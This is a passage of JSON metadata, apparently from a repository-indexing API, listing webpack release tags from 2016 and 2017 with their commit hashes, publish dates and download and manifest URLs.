v3.8.1/manifests"},{"name":"v3.8.0","sha":"1dc561865ad57d9e862832ccf3579f67a8bbba2d","kind":"tag","published_at":"2017-10-17T09:15:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.0/manifests"},{"name":"v3.7.1","sha":"ce24e98bc084bf45a271fb05b14b0e9829686149","kind":"tag","published_at":"2017-10-11T19:39:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.7.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.1/manifests"},{"name":"v3.7.0","sha":"551ea76838f163a1e0fbf65182e2ac08d346a1f3","kind":"tag","published_at":"2017-10-11T18:07:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.0/manifests"},{"name":"v3.6.0","sha":"622675993d72c6ea7d70cd2e503fd9416f940b2b","kind":"tag","published_at":"2017-09-15T08:45:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.6.0/manifests"},{"name":"v3.5.6","sha":"92d5c209437f9ef9293571e24cc8dcf10459d578","kind":"tag","published_at":"2017-09-06T15:41:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.6","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.6/manifests"},{"name":"v3.5.5","sha":"ef6ab6820a74db730cfec6fd419d2c211d62c0bd","kind":"tag","published_at":"2017-08-16T14:55:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.5","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.5/manifests"},{"name":"v3.5.4","sha":"990563f9a2b3fb3e817b7e1b9d6841bcd1eaa51e","kind":"tag","published_at":"2017-08-12T09:16:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.4","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.4/manifests"},{"name":"v3.5.3","sha":"4b2b1ad99b86458983714c589c6495772b1292ee","kind":"tag","published_at":"2017-08-10T13:38:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.3","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.3/manifests"},{"name":"v3.5.2","sha":"25302e51a601b4e30a661d788471e4a50b7a9764","kind":"tag","published_at":"2017-08-09T10:51:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.2","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.2/manifests"},{"name":"v3.5.1","sha":"5be959311a746b976a0a56625cc4372307b351ed","kind":"tag","published_at":"2017-08-08T11:26:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.1/manifests"},{"name":"v3.5.0","sha":"75a8ffec0a8ab2f1f07a950ee965a31917af5fe9","kind":"tag","published_at":"2017-08-08T08:50:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.0/manifests"},{"name":"v3.4.1","sha":"1f064bc84f222305afada087f9631fd7ae39ea30","kind":"tag","published_at":"2017-07-26T08:48:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.1/manifests"},{"name":"v3.4.0","sha":"c8732c8d157ed56542d521a557dda7ff7ad12ffb","kind":"tag","published_at":"2017-07-25T14:27:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.0/manifests"},{"name":"v3.3.0","sha":"5b119e7c5b437fd48e7e681996b9be10cbd6de34","kind":"tag","published_at":"2017-07-15T13:52:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.3.0/manifests"},{"name":"v2.7.0","sha":"eeea490e8ec0e2341cd4bb6da82aabf6ca139322","kind":"tag","published_at":"2017-07-12T07:00:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.7.0/manifests"},{"name":"v3.2.0","sha":"d0059901266e54a22309c419cad6d9327767c5a3","kind":"tag","published_at":"2017-07-11T20:09:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.2.0/manifests"},{"name":"v3.1.0","sha":"4bb3018da4310deaeff52b8a1c2b5645282b9994","kind":"tag","published_at":"2017-07-06T21:57:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.1.0/manifests"},{"name":"v3.0.0","sha":"bf4ec9c26e8f6de76c3d3ec1371f3ca1c8999ca5","kind":"tag","published_at":"2017-06-19T15:37:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0/manifests"},{"name":"v3.0.0-rc.2","sha":"2ba04991056475509a4e45599a1f42e91cce6233","kind":"tag","published_at":"2017-06-14T21:46:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.2/manifests"},{"name":"v3.0.0-rc.1","sha":"2e8b77ddcf66867b208dffce97fb94a87be48369","kind":"tag","published_at":"2017-06-07T11:33:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.1/manifests"},{"name":"v3.0.0-rc.0","sha":"3d653290fafe385277b48e5a36807124618b9561","kind":"tag","published_at":"2017-06-05T14:12:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.0/manifests"},{"name":"v2.6.1","sha":"7cfd2c490ea96c9676e8de54f2e7b6d1214722da","kind":"tag","published_at":"2017-05-25T11:16:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.6.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"af05c147f24d3e7ee62e0c4102bb32c55e73b8d7","kind":"tag","published_at":"2017-05-22T20:38:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.0/manifests"},{"name":"v2.5.1","sha":"ad2f68f1f21602750ad891ea89a926806acbc95f","kind":"tag","published_at":"2017-05-06T20:07:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"bf3652b16b65c27db5243aa0d674e2de4a8ccde9","kind":"tag","published_at":"2017-05-04T10:17:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.0/manifests"},{"name":"v2.4.1","sha":"bd753567da1248624beaaea14af31d6dbe303411","kind":"tag","published_at":"2017-04-14T13:34:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"0cbd8fd1a05ee401b5feb95ba2b8edae31571d94","kind":"tag","published_at":"2017-04-14T11:42:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.0/manifests"},{"name":"v1.15.0","sha":"d4878a55be7a4b7ac4e5db1ae5eef89e15811072","kind":"tag","published_at":"2017-04-13T10:18:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.15.0/manifests"},{"name":"v2.3.3","sha":"ba24c1b163dc038ed738eb4a57dcb241bf63146d","kind":"tag","published_at":"2017-04-03T07:49:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"6b209b13d76ec43080d6afbad4bb4dd6931e4638","kind":"tag","published_at":"2017-03-25T00:02:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.2/manifests"},{"name":"v2.3.1","sha":"4b9b660e8c4fe8ab6425014cb24dcec2d5df194b","kind":"tag","published_at":"2017-03-22T14:40:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"46dc08e6317170a56df6c34adc8133dd6f70f1fa","kind":"tag","published_at":"2017-03-21T22:43:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.0/manifests"},{"name":"v2.2.1","sha":"0445b156d2c958536b72036e68ca6bde0ad32055","kind":"tag","published_at":"2017-01-30T21:13:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"4be093d27942c25ec802a40268ed94e24d886b1d","kind":"tag","published_at":"2017-01-17T19:14:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0/manifests"},{"name":"v2.2.0-rc.8","sha":"227846990cbc1a406bb61c5e6cafb3f3f38c8cdd","kind":"tag","published_at":"2017-01-17T18:46:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.8","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.8/manifests"},{"name":"v2.2.0-rc.7","sha":"0b476022bbbddb206432e20b9c8bc5e91e592202","kind":"tag","published_at":"2017-01-16T15:01:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.7","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.7/manifests"},{"name":"v2.2.0-rc.6","sha":"97966969b0c9e8425ecb1238deea979c6a18cb27","kind":"tag","published_at":"2017-01-16T02:48:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.6","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.6/manifests"},{"name":"v2.2.0-rc.5","sha":"437dce4c8684f4295b5bb68a6ea5662c2660d780","kind":"tag","published_at":"2017-01-15T16:23:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.5","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.5/manifests"},{"name":"v2.2.0-rc.4","sha":"f745f02910cb45a55ed659ebd99288e45a38e873","kind":"tag","published_at":"2017-01-11T15:42:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.4","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.4/manifests"},{"name":"v2.2.0-rc.3","sha":"92a8be23614f92bc5669bf43eb0ddf746b2477e7","kind":"tag","published_at":"2016-12-28T15:03:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.3/manifests"},{"name":"v2.2.0-rc.2","sha":"8369cc4c03767d7a76d1f7a047d11e71a550ddae","kind":"tag","published_at":"2016-12-22T10:51:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.2/manifests"},{"name":"v2.2.0-rc.1","sha":"27e604e23100274a8887a5acf0008376d2617071","kind":"tag","published_at":"2016-12-17T08:09:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.1/manifests"},{"name":"v2.2.0-rc.0","sha":"057814be1930cc4e8cee22c271823ea821ad067f","kind":"tag","published_at":"2016-12-14T21:32:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.0/manifests"},{"name":"v2.1.0-beta.28","sha":"2e2eac70ab1ba648ef663b9b93fdedd7928672c4","kind":"tag","published_at":"2016-12-13T07:58:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.28","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.28/manifests"},{"name":"v1.14.0","sha":"e666686d9029753c243db5880de44aba57151d76","kind":"tag","published_at":"2016-12-07T08:06:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.14.0/manifests"},{"name":"v2.1.0-beta.27","sha":"adaca2578cc3dcffbb2d0b639cb611a53f6da7c9","kind":"tag","published_at":"2016-11-15T19:00:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.27","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.27/manifests"},{"name":"v2.1.0-beta.26","sha":"afbdff48ef2d5b